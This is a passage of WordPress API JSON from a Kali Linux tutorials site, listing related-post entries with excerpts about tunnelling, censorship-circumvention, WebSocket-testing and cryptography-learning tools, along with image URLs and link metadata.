https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEilaTo9cvyxmsea1tcaX9oWukhTlCYrVZhC-BvnQW3spYE9DISfHd-aIgowysTmVQlytZWfPpnWwpIw8M44WRigPfieBsAIoq30UIAb7HuD2NcWalEazE4j5GcDOg4tRIAAAptBwx83Gs4hWsgUbqF1olI7py_ZUHCc0KfTxshrSAoxuf8oAA_RZ9jWmx7M\/s16000\/Wstunnel%20.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEilaTo9cvyxmsea1tcaX9oWukhTlCYrVZhC-BvnQW3spYE9DISfHd-aIgowysTmVQlytZWfPpnWwpIw8M44WRigPfieBsAIoq30UIAb7HuD2NcWalEazE4j5GcDOg4tRIAAAptBwx83Gs4hWsgUbqF1olI7py_ZUHCc0KfTxshrSAoxuf8oAA_RZ9jWmx7M\/s16000\/Wstunnel%20.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":24692,"url":"https:\/\/kalilinuxtutorials.com\/cloak\/","url_meta":{"origin":26872,"position":1},"title":"Cloak : A Censorship Circumvention Tool To Evade Detection By Authoritarian State Adversaries","author":"R K","date":"May 19, 2022","format":false,"excerpt":"Cloak is a\u00a0pluggable transport\u00a0that enhances traditional proxy tools like OpenVPN to evade\u00a0sophisticated censorship\u00a0and\u00a0data discrimination. Cloak is not a standalone proxy program. Rather, it works by masquerading proxied traffic as normal web browsing activities. In contrast to traditional tools which have very prominent traffic fingerprints and can be blocked by simple\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhct6zK-ZqTevs_Jy-Tds6YEuE7Ab8tKHExLqdbvjY7GFNnN3jk2i1X5D7R5NkcIEBcIYqJ8rD9ho-hMby_VrGalTyI5VFaX_CE4rND_eM1inVWZtXgxvFY7RHu5BDBs4WGPSlq2w3CyO1cz5Wz54lThJRgGcpknAwk-wRLJrkMp-QkLSwUcRv3CUOL\/s728\/logo%20%281%29.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhct6zK-ZqTevs_Jy-Tds6YEuE7Ab8tKHExLqdbvjY7GFNnN3jk2i1X5D7R5NkcIEBcIYqJ8rD9ho-hMby_VrGalTyI5VFaX_CE4rND_eM1inVWZtXgxvFY7RHu5BDBs4WGPSlq2w3CyO1cz5Wz54lThJRgGcpknAwk-wRLJrkMp-QkLSwUcRv3CUOL\/s728\/logo%20%281%29.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhct6zK-ZqTevs_Jy-Tds6YEuE7Ab8tKHExLqdbvjY7GFNnN3jk2i1X5D7R5NkcIEBcIYqJ8rD9ho-hMby_VrGalTyI5VFaX_CE4rND_eM1inVWZtXgxvFY7RHu5BDBs4WGPSlq2w3CyO1cz5Wz54lThJRgGcpknAwk-wRLJrkMp-QkLSwUcRv3CUOL\/s728\/logo%20%281%29.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhct6zK-ZqTevs_Jy-Tds6YEuE7Ab8tKHExLqdbvjY7GFNnN3jk2i1X5D7R5NkcIEBcIYqJ8rD9ho-hMby_VrGalTyI5VFaX_CE4rND_eM1inVWZtXgxvFY7RHu5BDBs4WGPSlq2w3CyO1cz5Wz54lThJRgGcpknAwk-wRLJrkMp-QkLSwUcRv3CUOL\/s728\/logo%20%281%29.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":20935,"url":"https:\/\/kalilinuxtutorials.com\/clash-2\/","url_meta":{"origin":26872,"position":2},"title":"Clash : A Rule-Based Tunnel In Go","author":"R K","date":"December 24, 2021","format":false,"excerpt":"Clash is a tool like a rule-based Tunnel In Go Features Local HTTP\/HTTPS\/SOCKS server with authentication supportVMess, Shadowsocks, Trojan, Snell protocol support for remote connectionsBuilt-in DNS server that aims to minimize DNS pollution attack impact, supports DoH\/DoT upstream and fake IP.Rules based off domains, GEOIP, IPCIDR or Process to forward\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEjlNAwSyfX9PzzHkEzAeCmGYzK-HEDWwFyKjUQWbbwDWamyN0koz4yrbj1PeYJkKvMzORuQFCgjQDY4kyUZV6kL2hWfga4htsriEabhg_6VSDp0LZMDBCHXLbNOB_5Y6ISG8pY04quq4gXyObMjqbLg17oKLuoX16iJXEt4x-US-CBVM-AqbXoIZVgL=s728","width":350,"height":200,"srcset":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEjlNAwSyfX9PzzHkEzAeCmGYzK-HEDWwFyKjUQWbbwDWamyN0koz4yrbj1PeYJkKvMzORuQFCgjQDY4kyUZV6kL2hWfga4htsriEabhg_6VSDp0LZMDBCHXLbNOB_5Y6ISG8pY04quq4gXyObMjqbLg17oKLuoX16iJXEt4x-US-CBVM-AqbXoIZVgL=s728 1x, https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEjlNAwSyfX9PzzHkEzAeCmGYzK-HEDWwFyKjUQWbbwDWamyN0koz4yrbj1PeYJkKvMzORuQFCgjQDY4kyUZV6kL2hWfga4htsriEabhg_6VSDp0LZMDBCHXLbNOB_5Y6ISG8pY04quq4gXyObMjqbLg17oKLuoX16iJXEt4x-US-CBVM-AqbXoIZVgL=s728 1.5x, https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEjlNAwSyfX9PzzHkEzAeCmGYzK-HEDWwFyKjUQWbbwDWamyN0koz4yrbj1PeYJkKvMzORuQFCgjQDY4kyUZV6kL2hWfga4htsriEabhg_6VSDp0LZMDBCHXLbNOB_5Y6ISG8pY04quq4gXyObMjqbLg17oKLuoX16iJXEt4x-US-CBVM-AqbXoIZVgL=s728 2x"},"classes":[]},{"id":20192,"url":"https:\/\/kalilinuxtutorials.com\/clash\/","url_meta":{"origin":26872,"position":3},"title":"Clash : A Rule-Based Tunnel In Go","author":"R K","date":"November 12, 2021","format":false,"excerpt":"Clash a rule-based tunnel in Go. Features Local HTTP\/HTTPS\/SOCKS server with authentication supportVMess, Shadowsocks, Trojan, Snell protocol support for remote connectionsBuilt-in DNS server that aims to minimize DNS pollution attack impact, supports DoH\/DoT upstream and fake IP.Rules based off domains, GEOIP, IPCIDR or Process to forward packets to different nodesRemote\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEhCkbut-GqW7xdEmC7Ve9Awp479P2UNo-PXlBP5Jm-eo4ElOmy7Xb_xODRYUE4jh1PWtRIz8fAxH5uKYcCfDGPnqSJgHvGyffLwEGVz9FtZc9rfBTA4t9KgXC1_SZFIo0oJECTp3yNUEIz0V0mmwCwRHtpfMDeAh8m6ccdmBpe148q17x1qoReiBEbw=s728","width":350,"height":200,"srcset":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEhCkbut-GqW7xdEmC7Ve9Awp479P2UNo-PXlBP5Jm-eo4ElOmy7Xb_xODRYUE4jh1PWtRIz8fAxH5uKYcCfDGPnqSJgHvGyffLwEGVz9FtZc9rfBTA4t9KgXC1_SZFIo0oJECTp3yNUEIz0V0mmwCwRHtpfMDeAh8m6ccdmBpe148q17x1qoReiBEbw=s728 1x, https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEhCkbut-GqW7xdEmC7Ve9Awp479P2UNo-PXlBP5Jm-eo4ElOmy7Xb_xODRYUE4jh1PWtRIz8fAxH5uKYcCfDGPnqSJgHvGyffLwEGVz9FtZc9rfBTA4t9KgXC1_SZFIo0oJECTp3yNUEIz0V0mmwCwRHtpfMDeAh8m6ccdmBpe148q17x1qoReiBEbw=s728 1.5x, https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEhCkbut-GqW7xdEmC7Ve9Awp479P2UNo-PXlBP5Jm-eo4ElOmy7Xb_xODRYUE4jh1PWtRIz8fAxH5uKYcCfDGPnqSJgHvGyffLwEGVz9FtZc9rfBTA4t9KgXC1_SZFIo0oJECTp3yNUEIz0V0mmwCwRHtpfMDeAh8m6ccdmBpe148q17x1qoReiBEbw=s728 2x"},"classes":[]},{"id":21530,"url":"https:\/\/kalilinuxtutorials.com\/stews\/","url_meta":{"origin":26872,"position":4},"title":"STEWS : A Security Tool For Enumerating Web Sockets","author":"R K","date":"February 1, 2022","format":false,"excerpt":"STEWS is a tool suite for security testing of Web Sockets This research was first presented at\u00a0OWASP Global AppSec US 2021 Features STEWS provides the ability to: Discover: find WebSockets endpoints on the web by testing a list of domainsFingerprint: determine what WebSockets server is running on the endpointVulnerability Detection:\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEiYTNvCMMNPzUMzT4m0pdTM-FkC3LWEH-0uxSlQ1Ol7WO2yCC8y9fdxWoO5Iu2lQKqaIK8qCiEwDMmOFnlu3r2ZaDVl5sU5U2Sek6QFIBVfyeKtfim_1U-JDnPzSx2QAP3HEiSvNvx2KIuhoV-KsSN9vWBEzv9ZKnPEyR19VrrG5kiFDshSfiTAwH04=s728","width":350,"height":200,"srcset":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEiYTNvCMMNPzUMzT4m0pdTM-FkC3LWEH-0uxSlQ1Ol7WO2yCC8y9fdxWoO5Iu2lQKqaIK8qCiEwDMmOFnlu3r2ZaDVl5sU5U2Sek6QFIBVfyeKtfim_1U-JDnPzSx2QAP3HEiSvNvx2KIuhoV-KsSN9vWBEzv9ZKnPEyR19VrrG5kiFDshSfiTAwH04=s728 1x, https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEiYTNvCMMNPzUMzT4m0pdTM-FkC3LWEH-0uxSlQ1Ol7WO2yCC8y9fdxWoO5Iu2lQKqaIK8qCiEwDMmOFnlu3r2ZaDVl5sU5U2Sek6QFIBVfyeKtfim_1U-JDnPzSx2QAP3HEiSvNvx2KIuhoV-KsSN9vWBEzv9ZKnPEyR19VrrG5kiFDshSfiTAwH04=s728 1.5x, https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEiYTNvCMMNPzUMzT4m0pdTM-FkC3LWEH-0uxSlQ1Ol7WO2yCC8y9fdxWoO5Iu2lQKqaIK8qCiEwDMmOFnlu3r2ZaDVl5sU5U2Sek6QFIBVfyeKtfim_1U-JDnPzSx2QAP3HEiSvNvx2KIuhoV-KsSN9vWBEzv9ZKnPEyR19VrrG5kiFDshSfiTAwH04=s728 2x"},"classes":[]},{"id":2440,"url":"https:\/\/kalilinuxtutorials.com\/crypton\/","url_meta":{"origin":26872,"position":5},"title":"Crypton &#8211; Attacks On Various Encryption Systems, Digital Signatures, Hashing Algorithms","author":"R K","date":"September 2, 2018","format":false,"excerpt":"Crypton is an educational library to learn and practice Offensive and Defensive Cryptography. It is basically a collection of explanation and implementation of all the existing vulnerabilities and attacks on various Encryption Systems (Symmetric and Asymmetric), Digital Signatures, Message Authentication Codes and Authenticated Encryption Systems. Each attack is also supplemented\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/08\/Library-Structure.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/08\/Library-Structure.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/08\/Library-Structure.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/08\/Library-Structure.png?resize=700%2C400&ssl=1 2x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/26872","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=26872"}],"version-history":[{"count":14,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/26872\/revisions"}],"predecessor-version":[{"id":26894,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/26872\/revisions\/26894"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/26895"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=26872"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=26872"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=26872"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}